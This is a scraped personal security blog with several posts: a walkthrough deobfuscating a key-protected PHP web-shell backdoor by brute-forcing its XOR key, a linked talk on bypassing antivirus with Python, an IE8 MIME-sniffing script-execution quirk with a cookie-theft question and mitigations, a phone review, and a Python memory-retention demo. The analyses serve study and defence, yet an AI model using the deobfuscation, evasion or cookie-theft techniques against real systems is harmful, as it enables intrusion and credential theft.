<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuscvvLbeSjlXFrFsBaAPO7ktRYcmnq9I-stMb7e_CcdB4aJrsrqPRAgXHzmPp6yyshrKdUkHF7xO8mne0M3eey7cRIVH73AFjNo8qofk4st19XpeZ-dcvqcozkIgvkL0xea_QPMdi6Rdx/s1600/capture1.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuscvvLbeSjlXFrFsBaAPO7ktRYcmnq9I-stMb7e_CcdB4aJrsrqPRAgXHzmPp6yyshrKdUkHF7xO8mne0M3eey7cRIVH73AFjNo8qofk4st19XpeZ-dcvqcozkIgvkL0xea_QPMdi6Rdx/s1600/capture1.PNG" height="185" width="640" /></a><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Let's rename it to give it a nicer view..<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBysQiznJjrty7pk2qKGNsak6tJGEeZmrBZldreaOZ_zB6rfGuD86feL7-8w1bWeHONKnizKYDdq1lFvVF-skzgKLmHMRxNWvkQXprGDwIpLvBbjRz1NUVYr9NA1bXEjf9XIRTU9HZAYhH/s1600/capture2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBysQiznJjrty7pk2qKGNsak6tJGEeZmrBZldreaOZ_zB6rfGuD86feL7-8w1bWeHONKnizKYDdq1lFvVF-skzgKLmHMRxNWvkQXprGDwIpLvBbjRz1NUVYr9NA1bXEjf9XIRTU9HZAYhH/s1600/capture2.PNG" height="227" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
Summary on how this backdoor works:</div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<ul style="text-align: left;">
<li>Malicious data is stored in base64.</li>
<li>Upon execution of the script</li>
<li>The $<b>data</b> will be decoded from base64</li>
<li>Attacker/Controller need to submit<b> </b>a correct <b>$key_value</b> via <b>POST</b> or <b>COOKIE</b></li>
<li>Each byte of decoded data in <b>$data_decode </b>is XOR against ([<b>$key_value + 72670] % 256)</b></li>
<li><b>$data_decode </b>strings will be reversed and inflate via <b>gzinflate </b> and assigned to <b>$data_deflate</b></li>
<li><b>$data_deflate </b>crc32 will be compared agains <b>$data_crc32</b> to ensure the integrity of the code</li>
<li>A full payload function will be created and executed.</li>
</ul>
<br />
Based on experience you can predict that the final output will contain a function call to either <b>exec() , eval(), proc_open() </b>blax33.<br />
<br />
There are 3 major challenges in order to decode the <b>$data</b> properly:<br />
<br />
<ul style="text-align: left;">
<li>Finding the correct keys.</li>
<li>Any error in <b>gzinflate() </b> will trigger an exception and stop the script from executing.</li>
<li>Getting the correct crc32 checksum. </li>
</ul>
<div>
Althought the correct keys is generate from ( <b>$key_value +76270 ) mod 256 </b>, It's possible just to bruteforce for the correct key from 0x00 till 0xFF due to the fact that the payload is xor one byte at a time.</div>
<div>
<br /></div>
<div>
I've tried to decode it back in python. To my disappoinment there is no gzinflate function in python but a famous snippet to compensate that is as below:</div>
<div>
<br /></div>
<div>
<blockquote class="tr_bq" style="background-color: #f9f9f9; clear: none; color: #333333; font-size: 12px; letter-spacing: -1px; line-height: 1.333; overflow: visible; padding: 0px; width: auto;">
<span style="color: crimson; font-family: 'Courier New', Courier, monospace; font-size: 13px; margin: 0px; padding: 0px;"><span style="color: #333333; font-size: 12px; line-height: 1.333;">ungziped_str = </span>zlib</span>.<span style="color: black; font-family: 'Courier New', Courier, monospace; font-size: 13px; margin: 0px; padding: 0px;">decompressobj</span><span style="color: black; font-family: 'Courier New', Courier, monospace; font-size: 13px; margin: 0px; padding: 0px;">(</span><span style="color: black; font-family: 'Courier New', Courier, monospace; font-size: 13px; margin: 0px; padding: 0px;">)</span>.<span style="color: black; font-family: 'Courier New', Courier, monospace; font-size: 13px; margin: 0px; padding: 0px;">decompress</span><span style="color: black; font-family: 'Courier New', Courier, monospace; font-size: 13px; margin: 0px; padding: 0px;">(</span><span style="color: darkslateblue; font-family: 'Courier New', Courier, monospace; font-size: 13px; margin: 0px; padding: 0px;">'x<span style="color: #000099; font-weight: bold; margin: 0px; padding: 0px;">\x</span>9c'</span> + gziped_str<span style="color: black; font-family: 'Courier New', Courier, monospace; font-size: 13px; margin: 0px; padding: 0px;">)</span></blockquote>
</div>
<div>
So my watevershit scripting skills . If I can find the correct key I should be able to print out the payload.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjY20-hhDSd7WYxAqWuLJle9wONfAEr0pl-ya3spIccJ_yQhH2RDpBg8Y7DEhCxKefdeRJnyHcEJ1TCeoWxr8EUvo7HtRqr_x5CLH24SlwSXLtFlbA-vGTDlPXt6d_KTyp22-cBjvofQRT9/s1600/capture3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjY20-hhDSd7WYxAqWuLJle9wONfAEr0pl-ya3spIccJ_yQhH2RDpBg8Y7DEhCxKefdeRJnyHcEJ1TCeoWxr8EUvo7HtRqr_x5CLH24SlwSXLtFlbA-vGTDlPXt6d_KTyp22-cBjvofQRT9/s1600/capture3.PNG" height="240" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
But will the scripts work as expected ?</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgz-ZHLtYvBdyhE8PSQzK4MDIdYdSX0aS0VyzQvYqTGM38emD_may_RJmsQ4EIyYG1IZxUjW_sFCIsuRIdIhzZ7e55cq9LEBgGMmmfWw7sjo22W4nEyub0jNHPQ80_HLadULx8zio-znWNz/s1600/Capture4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgz-ZHLtYvBdyhE8PSQzK4MDIdYdSX0aS0VyzQvYqTGM38emD_may_RJmsQ4EIyYG1IZxUjW_sFCIsuRIdIhzZ7e55cq9LEBgGMmmfWw7sjo22W4nEyub0jNHPQ80_HLadULx8zio-znWNz/s1600/Capture4.png" height="94" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div>
<b>TOPKEK haram nye zlib</b></div>
<div>
<b><br /></b></div>
<div>
I'm still figuring out how to be able to inflate the string without triggering an exception . </div>
<div>
<br /></div>
<div>
<b>Conclusion</b></div>
<div>
<b><br /></b></div>
<div>
The backdoor is duh obviouly a backdoor, It can be detected easily. However implementing a key to the gzinflate value will stop the payload from being executed both by normal user and reverser..</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
P/S:<b>If anyone can solve this problem it would be nice.</b></div>
<div>
<br /></div>
<div>
Attached is the link below :</div>
<div>
<br /></div>
<div>
1. Original Code : <a href="http://pastebin.com/aLS0NtdZ">http://pastebin.com/aLS0NtdZ</a></div>
<div>
2. Label Code : <a href="http://pastebin.com/Gg56vLni">http://pastebin.com/Gg56vLni</a></div>
<div>
3. Half-Baked Decoder in Python: <a href="http://pastebin.com/HzgFmgr1">http://pastebin.com/HzgFmgr1</a></div>
<div>
<br /></div>
<div>
Btw it's May . Stay tune for <b>WARGAMES 2015.</b><br />
<b><br /></b>
<span style="color: red;">Updated </span>:<br />
<br />
Thanks to<a href="https://www.facebook.com/fadhil86?fref=ufi" target="_blank"> Syed Mohd Fadhil</a> he introduced two way to handle the zlib error .<br />
Instad of using 'x\x9c' use guide from <a href="http://www.php2python.com/wiki/function.gzinflate/" target="_blank">php2python</a> the equivalent for gzinflate in python like php is<br />
<br />
<blockquote class="tr_bq">
<pre style="font-size: 15px;"><span class="n">zlib</span><span class="o" style="color: #666666;">.</span><span class="n">decompress</span><span class="p">(</span><span class="n">compressed_data</span><span class="p">,</span> <span class="o" style="color: #666666;">-</span><span class="mi" style="color: #666666;">15</span><span class="p">)</span></pre>
</blockquote>
And also introduced a nice <b>try and except</b> block to deal with any exception <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLGVWz6IJXRzVEeH1E0NUKuDlUrW6yy634iWVYlC5Ba5OjVyS1WHUhFDzhaDjxXp8FjUmJYtNRilPd38hyphenhyphengerIUEOS_m74G1oOy9e5Ka4Zp5ylENwHOqMiiQupoobBXzw7xjiXclgnT84b/s1600/capture4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLGVWz6IJXRzVEeH1E0NUKuDlUrW6yy634iWVYlC5Ba5OjVyS1WHUhFDzhaDjxXp8FjUmJYtNRilPd38hyphenhyphengerIUEOS_m74G1oOy9e5Ka4Zp5ylENwHOqMiiQupoobBXzw7xjiXclgnT84b/s1600/capture4.PNG" height="130" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
And Walla we have a nice shell ..</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlQDj13zT1LxImWvTbEwh4QQ9fb259JC3dN7c69HBFFKkzvb7OUqKwYXnNQKL3NGDfA5-zQCbl1CSbSO5BNnw8mBPQFtXs2y2ZMIdfMaaSyvuezEFqkuK5KzxN9owbw0846C7wX5xIi-rk/s1600/capture5.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlQDj13zT1LxImWvTbEwh4QQ9fb259JC3dN7c69HBFFKkzvb7OUqKwYXnNQKL3NGDfA5-zQCbl1CSbSO5BNnw8mBPQFtXs2y2ZMIdfMaaSyvuezEFqkuK5KzxN9owbw0846C7wX5xIi-rk/s1600/capture5.PNG" height="191" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Thanks all for the help</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Attached is the full link </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Bruteforce script: <a href="http://pastebin.com/AFDJcUpK">http://pastebin.com/AFDJcUpK</a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Full Web Shell Code : <a href="http://pastebin.com/nmgQwTTf">http://pastebin.com/nmgQwTTf</a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<blockquote class="tr_bq">
<br /></blockquote>
</div>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4865819153630384661.post-12807534427008004432015-03-15T14:58:00.001+08:002015-03-15T14:58:42.243+08:00Bypassing AV in 2015<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
Haven't blog for quite some time. This is the basis classical techniques that can be used to bypass AV via Python. Take note current code might not be able to bypass all BUT you be aware that there are tons of API that can be use :)<br />
<br />
<br /></div>
<iframe frameborder="0" height="400" marginheight="0" marginwidth="0" scrolling="no" src="//www.slideshare.net/slideshow/embed_code/45845753" width="476"></iframe><br />
<br />
<br />
Get the PDF Files here<br />
<br />
https://drive.google.com/file/d/0B9B87VpPnaYiZHZsUjZORXd2Qzg/view?usp=sharing<br />
<br />
<br />
<br />
<br /></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4865819153630384661.post-63396069860596047912014-07-22T23:54:00.002+08:002014-07-22T23:54:54.080+08:00Gadget Review : Xperia M2 (value for money)<div dir="ltr" style="text-align: left;" trbidi="on">
I usually don't blog much about gadgets. But my phone had become too antique and hot (anybody still using Iphone 4?) . TImes changes, IOS is getting boring, and exploitation knowledge need to gear up a little bit.<br />
<br />
So after quick review with my master. Xperia M2 seems to be the right choice. Let's not bother about specs quality since it's not really dat important whether it's JB or ICS ,. Dalvik or Art or 21 mega pixel versus 5 mega pix.. kernel latest or not... for me <i>it doesn't matter.</i><br />
<i><br /></i>
What matters for me.<br />
<br />
<br />
1<b>. Rootable and Bootloader Unlocked. Checked!</b><br />
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbnaZUjM70B9rQUvOUqvpq0UgKKeSQ381mFw0FUxRG1Or_aJ-rlCQI0nuK-XOocHGVViEWDKwFC0m2ZuZYIpRPkfuWgrCL1ioBpQVJVjKptxlYpa5m-qMkuQQyco-gR3opfsmQS6s67Owm/s1600/rooting-status.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbnaZUjM70B9rQUvOUqvpq0UgKKeSQ381mFw0FUxRG1Or_aJ-rlCQI0nuK-XOocHGVViEWDKwFC0m2ZuZYIpRPkfuWgrCL1ioBpQVJVjKptxlYpa5m-qMkuQQyco-gR3opfsmQS6s67Owm/s1600/rooting-status.png" height="320" width="180" /></a></div>
<b><br /></b>
Rooting and Unlockable Bootlader is a must if we want to access most of the internal hardware capability provided by this phone.<br />
<br />
2. <b>Support Android Hacker Keyboard</b><br />
<b><br /></b>
Swipe/ Touchwiz craps? Hacker Keyboard is mandatory for me.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgquj-Z9O_2_7aS8W5zJdlVJWeQ80DCwGxMma2Vq6aKed0VXPrra19y7z5ATMFwIyufOAHtkfa3UQqW2OK_eiSBGsE1VC2S6Mdgexh96-Nglh9prOud8ZYee5k3_xTs-v6PJO738IZpUA6/s1600/hackers_keyboard_android_2.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgquj-Z9O_2_7aS8W5zJdlVJWeQ80DCwGxMma2Vq6aKed0VXPrra19y7z5ATMFwIyufOAHtkfa3UQqW2OK_eiSBGsE1VC2S6Mdgexh96-Nglh9prOud8ZYee5k3_xTs-v6PJO738IZpUA6/s1600/hackers_keyboard_android_2.gif" height="192" width="320" /></a></div>
<br />
<br />
3. <b>NXP Based NFC.</b><br />
<br />
This is the best NFC suitable for Malaysia Enviroment, cough cough.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHHxO6cYNw6jV_5TKjmlDfBaoGjBkPEde_Ccv7yD3e12iNFc0pMC8h_j4rffV1rhyphenhyphen_ac1Ty1VbIGMFHGYh9dy70Bhkr0G1X8apHczZR_fwSbh9uVWaZFCE1wwshK2gD5zZ5cBDjWgwnyV8/s1600/unnamed.webp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHHxO6cYNw6jV_5TKjmlDfBaoGjBkPEde_Ccv7yD3e12iNFc0pMC8h_j4rffV1rhyphenhyphen_ac1Ty1VbIGMFHGYh9dy70Bhkr0G1X8apHczZR_fwSbh9uVWaZFCE1wwshK2gD5zZ5cBDjWgwnyV8/s1600/unnamed.webp" height="320" width="179" /></a></div>
<br />
<b>4. Brick Resistence. </b><br />
<br />
In Xperia M2, there's a hidden switch besides the Sim Card and MMC that can restore the phone to original factory state.Use it with caution.<br />
<br />
<br />
5. <b>The Lord of Internet.</b><br />
<b><br /></b>
Can we combine LTE + Wimax + Wifi all together and create a happy NAT balancing? U bet!!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgR0enWYoqkxMqsGcTiXh5pnaAlySXbIvosxiLOBEhXHnEeRzML82oLAoS9cO9TtElsEozE-PhplLBwJPAXERI1a3CVAw_ELAHEJdi3tVtluZMYla6xKNY2lic2TU44Hz_RskzJQwdX_8EL/s1600/IMG_1030.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgR0enWYoqkxMqsGcTiXh5pnaAlySXbIvosxiLOBEhXHnEeRzML82oLAoS9cO9TtElsEozE-PhplLBwJPAXERI1a3CVAw_ELAHEJdi3tVtluZMYla6xKNY2lic2TU44Hz_RskzJQwdX_8EL/s1600/IMG_1030.JPG" height="309" width="320" /></a></div>
<br />
<br />
<div>
<b><br /></b></div>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4865819153630384661.post-86911989261053036842014-06-08T15:06:00.002+08:002014-06-08T15:06:53.976+08:00 Why is a raven like a writing desk? IE8 plain/text MIME Type or Media Type Issues <div dir="ltr" style="text-align: left;" trbidi="on">
<i>P/S: This might not be a new issue at all (But I documented it so I won't forget or at least know where to look )</i><br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://a1.s6img.com/cdn/0011/p/3092487_5807113_lz.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://a1.s6img.com/cdn/0011/p/3092487_5807113_lz.jpg" height="320" width="294" /></a> from Alice in Wonderland</div>
<br />
My life have it ups and downs . But last week was quite interesting, I was fortunate enough to be given a chance to conduct some lightning/bizzare art of penetration testing technique at a prestigious organization that can block <b>PornHub.</b><br />
<b><br /></b>
During my class on pwning a Win7 box I noticed that IE8 have some bizzare behaviour MIME type intepreation behaviour.<br />
<br />
On a plain/text Mime IE8 will CSS Javascript Input under <b>CompatabileView Mode.</b> (Default mode).<br />
<br />
Well dat just sucks right?<br />
<br />
POC.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDFf5xyDExzyzUcaUQAQcjeMXdIBKSfBLOfiuMYwnZw9lAHjgDYq6pxZVJMgxq2Plm9loEO5NUB1rYMZbtOgURMqRVMaXEePEFT-FHzNY2GXS5uy9S-uz_q0_WQFRMQs3BsqlQNj2RyTFI/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDFf5xyDExzyzUcaUQAQcjeMXdIBKSfBLOfiuMYwnZw9lAHjgDYq6pxZVJMgxq2Plm9loEO5NUB1rYMZbtOgURMqRVMaXEePEFT-FHzNY2GXS5uy9S-uz_q0_WQFRMQs3BsqlQNj2RyTFI/s1600/1.png" height="92" width="320" /></a></div>
<br />
Dat was expected. plain/text Mime was interpreted correctly.<br />
<br />
Now on IE8<br />
<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-j7oWQdwG0aUILOtakKN9RMin7l5GwWr-_mLT4Qv32GIUnnxC6Guz98p6PO5jHxIiNTVFXZ40SdIMXdHK5X7UD_ez8I53QjHUhXG7I9yCNJvyxU0sJqoIQiIEb2urcpSaQQvRHEzd_YOE/s1600/2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-j7oWQdwG0aUILOtakKN9RMin7l5GwWr-_mLT4Qv32GIUnnxC6Guz98p6PO5jHxIiNTVFXZ40SdIMXdHK5X7UD_ez8I53QjHUhXG7I9yCNJvyxU0sJqoIQiIEb2urcpSaQQvRHEzd_YOE/s1600/2.png" height="189" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">I trip and spray :(</td></tr>
</tbody></table>
Can we steal cookies?<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgt2rb8XFoLcMvoLVzJE7Iw6Gj1qBprmTguqhX1VhWWc_BJfG7HIKfwcVzsgSUXx51OuLO77f5bGPxAdkeG9rEWNimqeU0nlJyeFLUTbgJP1mCshYpwadqxNDtV-m4Jd0iUIXmpRs8U-XYu/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgt2rb8XFoLcMvoLVzJE7Iw6Gj1qBprmTguqhX1VhWWc_BJfG7HIKfwcVzsgSUXx51OuLO77f5bGPxAdkeG9rEWNimqeU0nlJyeFLUTbgJP1mCshYpwadqxNDtV-m4Jd0iUIXmpRs8U-XYu/s1600/3.png" height="202" width="320" /></a></div>
<br />
Solution?<br />
1. Disable Compatible View if you are not a developer..<br />
2. Upgrade to the latest IE<br />
3. Don`t use IE at all<br />
<br />
<br />
<br /></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4865819153630384661.post-63204851059383149022014-04-13T02:18:00.003+08:002014-04-13T02:18:45.802+08:00Immutable Data and Memory Sensitivity..<div dir="ltr" style="text-align: left;" trbidi="on">
Considered this python code snippets<br />
<br />
import hashlib<br />
while True:<br />
print("Enter your password")<br />
s = raw_input('--> ')<br />
print(s)<br />
print("Now the md5sum")<br />
s = hashlib.md5(s).hexdigest()<br />
print(s)<br />
<div>
<br /></div>
By any means it's relatively a simple code to understand, we use <i>s </i>as a placeholder for our incoming data string, compute it's md5sum and replace the s value with a hexdigest.. In short <i>s </i>now contain the md5sum in hex right? So any plaintext that we've entered should vanished and and flush out by the garbage collector in python VM right?<br />
<br />
Let's give it a test.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8kC1D1WggwqRHs3nUwLMf0s1M1etKwokThL1YYBjKDE03Y-MnbtM4NCR9ye_P2G1wv6bA1W70YKTszUMNQsQwyeUeO3zjB2huvSUz5IM_py6y_fjfiQ1xsMxS9G6ln1iZEOWTGBpeeOlh/s1600/Capture.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8kC1D1WggwqRHs3nUwLMf0s1M1etKwokThL1YYBjKDE03Y-MnbtM4NCR9ye_P2G1wv6bA1W70YKTszUMNQsQwyeUeO3zjB2huvSUz5IM_py6y_fjfiQ1xsMxS9G6ln1iZEOWTGBpeeOlh/s1600/Capture.PNG" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
So most people would think any previous plaintext value would be washed out from the memory. The String DogFood won`t exist right? Let's attach this current script on a debugger ('Im using edb debugger , the best thing besides windbg sorry stallman gdb just sux!!!!');<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizVvFWULnU2sBrcWfh2qeEvDp9Nl2fUBz0BYcV3nEtqHjQsKmxq0cRPRIBiXgpG1cnvnuAl7SQ1xoKAdWdZ0WW_R_IqIbPVOPlBq7KOPwLEG3wfB3FnvKsd0HhF_hmov60N2hNvVEhazsL/s1600/Capture2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizVvFWULnU2sBrcWfh2qeEvDp9Nl2fUBz0BYcV3nEtqHjQsKmxq0cRPRIBiXgpG1cnvnuAl7SQ1xoKAdWdZ0WW_R_IqIbPVOPlBq7KOPwLEG3wfB3FnvKsd0HhF_hmov60N2hNvVEhazsL/s1600/Capture2.PNG" height="195" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
I like using edb debugger, it helps for example binary search string. Since we have replace the s value from DogFood to a hex string. We shouldn`t see any DogFood string in the memory right? Unfortunely that is entirely not true :(</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOMCJRAB-2AK3Lv2J7v_IOrJ9gYctfWxBZH9tc6sjxlde6iRXxQ6Zz6tUXG7BFetO3N3Se2mEwylWbzgpsDsILxB3hbCXAZsP9YlmTSBpCBSg0AcCWS-Jo9kE8yegjBqeKmmqDwJYrK-xg/s1600/Capture3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOMCJRAB-2AK3Lv2J7v_IOrJ9gYctfWxBZH9tc6sjxlde6iRXxQ6Zz6tUXG7BFetO3N3Se2mEwylWbzgpsDsILxB3hbCXAZsP9YlmTSBpCBSg0AcCWS-Jo9kE8yegjBqeKmmqDwJYrK-xg/s1600/Capture3.png" height="285" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitXH0xPzxD4i4orb3BKNbwZEE6YH98NEwUb19jJQ0kR75eZUfBoWcy5EJlXx_Ixooj8XO0012TZOOrcKr_c_43ALGV7MbKVTrZo20rp700xuMkDG-OEGiW1L19jSN79ESl8f4s3PavW11p/s1600/Capture4.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitXH0xPzxD4i4orb3BKNbwZEE6YH98NEwUb19jJQ0kR75eZUfBoWcy5EJlXx_Ixooj8XO0012TZOOrcKr_c_43ALGV7MbKVTrZo20rp700xuMkDG-OEGiW1L19jSN79ESl8f4s3PavW11p/s1600/Capture4.PNG" height="134" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">DogFood in Hex</td></tr>
</tbody></table>
<span style="background-color: white;"> High-level languages often have data types that are </span><i style="background-color: white;" xmlns:fo="http://www.w3.org/1999/XSL/Format" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">immutable</i><span style="background-color: white;">. The program can only write to an immutable object once, at creation time. In other words s is just a label and the string maybe be stored in the same address or anywhere in the memory. (Noted to self, heap/stack/bss/dss/ is actually some sort of label the computer generated to ou give it some of approximate understanding on a specific region in the memory) </span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">Let's search for the md5sum string. </span>36f65df05afee9fb079943b7ba5d9617<br />
<span style="background-color: white;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0D3LgOry05lVqxyMSW1NpKeAGtMIYIHHiaIDyG4ziA1aP0NtSw4O6SSNP6poMoK8LaPnLA7IWA3-ytNrj9ujrtrRogcWL6-S4DU-JhNFYSOpLlR1MZxd8xvc9CjhdTCS90M2nreFeUj2b/s1600/capture5.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0D3LgOry05lVqxyMSW1NpKeAGtMIYIHHiaIDyG4ziA1aP0NtSw4O6SSNP6poMoK8LaPnLA7IWA3-ytNrj9ujrtrRogcWL6-S4DU-JhNFYSOpLlR1MZxd8xvc9CjhdTCS90M2nreFeUj2b/s1600/capture5.PNG" height="288" width="320" /></a></div>
<span style="background-color: white;"><br /></span>
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">The string was stored in a different address!!</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-5R17HGNQdg6FficIgaU7Zu9NyofP8gQK4Yuvzm33Ei1UOByI_8FTiw3GcWRe81Mtu8ATvRB0Mx38L2Ud9MTvg2HbTc8Zia7f6tLkSko_RLleQb08-aagVVRg-d0WbOKc2BiyrzETTyaF/s1600/Capture6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-5R17HGNQdg6FficIgaU7Zu9NyofP8gQK4Yuvzm33Ei1UOByI_8FTiw3GcWRe81Mtu8ATvRB0Mx38L2Ud9MTvg2HbTc8Zia7f6tLkSko_RLleQb08-aagVVRg-d0WbOKc2BiyrzETTyaF/s1600/Capture6.png" height="102" width="320" /></a></div>
<span style="background-color: white;"><br /></span>
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">So in a High Level Language, <i> <b>there is no gurantee your initial plaintext data in an address would be overwrite with a encrypted blob/binary . The only way to ensure overwrite is 100% is to use either mutable data structure that are capable of replacing dynamics element</b>.</i></span><br />
<span style="background-color: white;"><i><br /></i></span>
<span style="background-color: white;">So why did u see a chunk of the unencrypted/crypted data in the heartbleed heak leak? Not a surprise anymore right?</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;"><br /></span>
<span style="background-color: white;"><br /></span>
<div>
<br /></div>
</div>
